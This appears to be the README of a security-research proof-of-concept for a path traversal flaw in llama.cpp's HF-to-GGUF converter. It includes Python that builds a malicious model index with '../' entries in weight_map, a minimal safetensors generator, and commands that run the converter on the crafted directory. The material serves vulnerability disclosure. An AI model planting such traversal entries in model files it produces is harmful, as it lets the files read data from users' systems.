
llama.cpp convert_hf_to_gguf Path Traversal PoC (CWE-22)

Security Research - Proof of Concept

This repository contains a malicious sharded safetensors model directory that demonstrates a path traversal vulnerability in llama.cpp's convert_hf_to_gguf.py. The model.safetensors.index.json contains a weight_map entry with ../ path traversal sequences that cause the converter to read files outside the model directory.
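Concretely, the traversal lives in the weight_map values of the index file. A minimal sketch of what such an index looks like (the tensor name and sentinel path below are illustrative, not the exact payload poc.py emits):

```python
import json

# Sketch of a malicious sharded-model index. The "../" sequences in the
# weight_map value point the converter at a file outside the model directory.
index = {
    "metadata": {"total_size": 0},
    "weight_map": {
        # Illustrative tensor name and sentinel path
        "model.embed_tokens.weight": "../../../../tmp/sentinel.safetensors",
    },
}

with open("model.safetensors.index.json", "w") as f:
    json.dump(index, f, indent=2)
```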

Files

  • model.safetensors.index.json – Malicious weight index with path traversal in weight_map values
  • model.safetensors – Minimal valid safetensors file (triggers sharded model detection)
  • config.json – Minimal LLaMA config
  • tokenizer.json / tokenizer_config.json – Minimal tokenizer files
  • poc.py – Full PoC script that generates the malicious model directory
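The "minimal valid safetensors file" above only needs to pass format checks: the safetensors format is an 8-byte little-endian header length followed by a JSON header, then raw tensor data. A sketch of producing an empty-but-valid file under that layout:

```python
import json
import struct

# A safetensors file begins with an 8-byte little-endian unsigned integer
# giving the length of the JSON header that follows. With no tensors, the
# header alone is enough to be structurally valid.
header = json.dumps({"__metadata__": {"format": "pt"}}).encode("utf-8")
blob = struct.pack("<Q", len(header)) + header

with open("model.safetensors", "wb") as f:
    f.write(blob)
```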

Usage

pip install gguf transformers
git clone https://github.com/ggerganov/llama.cpp
python poc.py
python llama.cpp/convert_hf_to_gguf.py ./malicious_model/ --outfile /tmp/output.gguf
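The underlying CWE-22 mechanism is ordinary relative-path resolution: joining an attacker-controlled weight_map entry onto the model directory escapes it. A sketch of the general pattern (illustrative paths, not the converter's actual code):

```python
import os

base = "/models/malicious_model"                 # illustrative model directory
entry = "../../../../tmp/sentinel.safetensors"   # traversal payload from weight_map

# Joining and normalizing resolves the ".." components, landing outside base.
resolved = os.path.normpath(os.path.join(base, entry))
print(resolved)  # /tmp/sentinel.safetensors -- outside the model directory
```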

Disclaimer

This PoC is for authorized security research only. The payload reads a harmless sentinel file created by the script itself.
